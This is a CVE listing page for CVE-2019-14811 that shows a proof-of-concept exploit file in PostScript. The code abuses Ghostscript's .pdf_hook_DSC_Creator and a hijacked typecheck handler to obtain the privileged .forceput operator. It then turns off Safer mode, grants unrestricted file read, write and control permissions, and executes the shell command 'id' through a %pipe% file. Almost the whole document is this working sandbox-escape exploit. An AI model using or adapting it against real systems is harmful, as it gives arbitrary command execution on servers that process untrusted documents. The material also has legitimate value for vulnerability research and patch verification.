4837 Total CVEs
26 Years
GitHub
Home / 2019 / CVE-2019-14811
README.md
Rendering markdown...
POC / exploit.ps PS
⬇ Raw GitHub ✕ Close 
%!PS-Adobe-3.0 EPSF-3.0
%%Pages: 1
%%BoundingBox:   0 0  1000 1000
%%LanguageLevel: 1
%%EndComments
%%BeginProlog
%%EndProlog

/initialdevicename currentpagedevice /OutputDevice get 100 string cvs def

/showline {
    0 0 0 setrgbcolor
    /curpos curpos interval sub def
    interval 1 mul curpos moveto
    show
} def

currentpagedevice /OutputFile known {
    /outputfilename currentpagedevice /OutputFile get def
} {
    /outputfilename (undefined) def
} ifelse


1 1 1 setrgbcolor clippath fill

/pagewidth currentpagedevice /PageSize get 1 get def

/curpos pagewidth def

/interval pagewidth 25 div def

/Courier findfont interval scalefont setfont

(works!) showline pop



/println  { (\n) exch print print } bind executeonly def
/info     { ([*] ) print println } bind executeonly def
/success  { ([+] ) print println } bind executeonly def
/fail     { ([-] ) print println stop } bind executeonly def

/MaxFileSize 16#10 def
/readfile {
  (r) file
  dup MaxFileSize string readstring pop
  exch closefile
} bind executeonly def


(=============================================================================)
(=   Safer Mode Bypass by `.forceput` Exposure from `.pdf_hook_DSC_Creator`  =)
(=============================================================================)
println println println

(Obtaining .forceput operator from .pdf_hook_DSC_Creator operator...) info
/.forceput null def
systemdict /.pdfdsc get 24 get /.pdf_hook_DSC_Creator exch def
/&typecheck errordict /typecheck get def
/typecheckcount 0 def
errordict /typecheck {
  /typecheckcount typecheckcount 1 add def
  typecheckcount 2 eq {
    1 index 2 get 8 get
    /.forceput exch store
  } if
} put
null .pdf_hook_DSC_Creator clear
errordict /typecheck currentdict /&typecheck get put
[
  /&typecheck
  /typecheckcount
  /.pdf_hook_DSC_Creator
] { currentdict exch undef } forall
(A candidate for .forceput operator found!) success

(Attempting sanity check with the candidate for .forceput operator...) info
<< /overwritten false >> readonly
begin
  currentdict /overwritten true .forceput
  overwritten not {
    /.forceput where { /.forceput undef } if
  } if
end
currentdict /.forceput known not {
  (.forceput operator could not found...) fail
} if
(Successfully got .forceput operator!) success

(Overwriting several flags to escape from Safer Mode...) info
systemdict /SAFER false .forceput
userparams /LockFilePermissions false .forceput
userparams /PermitFileControl [(*)] .forceput
userparams /PermitFileWriting [(*)] .forceput
userparams /PermitFileReading [(*)] .forceput
save restore

SAFER {
  (Could not escape from Safer Mode.) fail
} bind executeonly if
(Successfully escaped from Safer Mode!) success

/readfile {
  (r) file
  dup MaxFileSize string readstring pop
  exch closefile
} bind executeonly def

/osexec {
 (%pipe%) exch concatstrings readfile
} bind executeonly def

0 1 300367 {} for
{save restore} stopped {} if
(id) osexec showline
showpage
quit